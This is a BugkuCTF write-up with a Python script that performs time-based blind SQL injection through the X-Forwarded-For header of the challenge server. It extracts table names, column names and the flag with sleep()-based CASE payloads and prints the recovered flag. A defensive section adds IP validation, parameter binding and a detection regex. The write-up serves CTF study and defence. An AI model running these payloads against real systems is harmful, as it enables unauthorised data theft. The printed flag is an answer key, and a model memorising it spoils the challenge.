CTF - BugkuCTF - insert into injection

The code is as follows

# -*- coding:utf-8 -*-
import requests

URL = "http://123.206.87.240:8002/web15/"
# Earlier payloads, extracted the same way (length -> value):
# "database()"                                                                                     -> 5,  web15           (find the database name)
# "(select group_concat(table_name) from information_schema.tables where table_schema='web15')"  -> 14, client_ip,flag  (find the table names)
# "(select group_concat(column_name) from information_schema.columns where table_name='flag')"   -> 4,  flag            (find the column name)
payload = "(select group_concat(flag) from flag)"  # -> 32, cdbf14c9551d5be5612f7bb5d2867853 (dump the data)

def getlen(payload):
    # binary search on the length; raise the sleep() delay on a slow network
    payload_length = "'+ (select case when length(%s)>%d then sleep(2) end)); -- '"
    maxv = 300
    minv = 0
    while True:
        mid = (maxv + minv) // 2  # integer division so the exit test below terminates
        rq = requests.get(URL, headers={"X-Forwarded-For": payload_length % (payload, mid)})
        if rq.elapsed.seconds >= 2:
            minv = mid
        else:
            maxv = mid
        if (maxv - minv) in [0, 1]:
            break
    print("[+] The length is %d" % maxv)
    return maxv

def getchar(payload, length):
    # one position at a time, one ASCII code at a time; a delayed response means a match
    payload_ascii = "'+ (select case when ord(substr(%s from %d for 1))=%d then sleep(2) end)); -- '"
    result = ''
    for i in range(length):
        for char in range(32, 127):
            rq = requests.get(URL, headers={"X-Forwarded-For": payload_ascii % (payload, i + 1, char)})
            if rq.elapsed.seconds >= 2:
                result += chr(char)
                print(result + ('.' * (length - i - 1)))
                break
    print("[+] The char is %s" % result)
    return result

leng = getlen(payload)
getchar(payload, leng)

Knowledge points

  1. substr('abc' from 1 for 1)
  2. select case when expression then expression end is equivalent to IF(expression, TRUE, FALSE)
  3. The like keyword is case-insensitive, and % and _ have to be handled (escaped) when matching. In addition, the , character cannot appear in this challenge, which is why the script uses the substr(... from ... for ...) form and ord() comparisons instead of comma-separated arguments.
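From the defender's side, as an added example that is not part of the original writeup and not the challenge's server code: the challenge's INSERT splices the X-Forwarded-For header into SQL, which is what the sleep()-based probes above exploit. The handler below accepts the header only if it parses as an IP address and binds it as a parameter, using an in-memory SQLite table named after the challenge's client_ip table; the schema, the function names and the detection regex are assumptions made for this example.

```python
import ipaddress
import re
import sqlite3

# Added example (not the challenge's code). The vulnerable pattern in this
# challenge is an INSERT that concatenates X-Forwarded-For into the statement.
# Two independent defences, each of which stops the time-based payloads above:
#   1) only accept the header value if it parses as an IP address;
#   2) bind the value as a parameter instead of building the SQL string.

def first_hop(xff_header):
    """Left-most address in X-Forwarded-For, or None when it is not an IP."""
    if not xff_header:
        return None
    candidate = xff_header.split(",", 1)[0].strip()
    try:
        return str(ipaddress.ip_address(candidate))
    except ValueError:
        return None

def new_db():
    """Constructed in-memory stand-in for the challenge's client_ip table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE client_ip (id INTEGER PRIMARY KEY, ip TEXT NOT NULL)")
    return conn

def store_client_ip(conn, xff_header):
    """Record the client address; returns the stored value, or None if rejected."""
    ip = first_hop(xff_header)
    if ip is None:
        return None
    # parameter binding: the value can never change the statement's structure
    conn.execute("INSERT INTO client_ip (ip) VALUES (?)", (ip,))
    conn.commit()
    return ip

# Detection side: tokens that appear in the writeup's time-based probes.
# Useful for flagging header values in access logs for review.
TIME_BLIND = re.compile(r"(?i)\bsleep\s*\(|\bcase\s+when\b|\bsubstr\s*\(")

def suspicious_xff(xff_header):
    return bool(xff_header) and bool(TIME_BLIND.search(xff_header))
```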
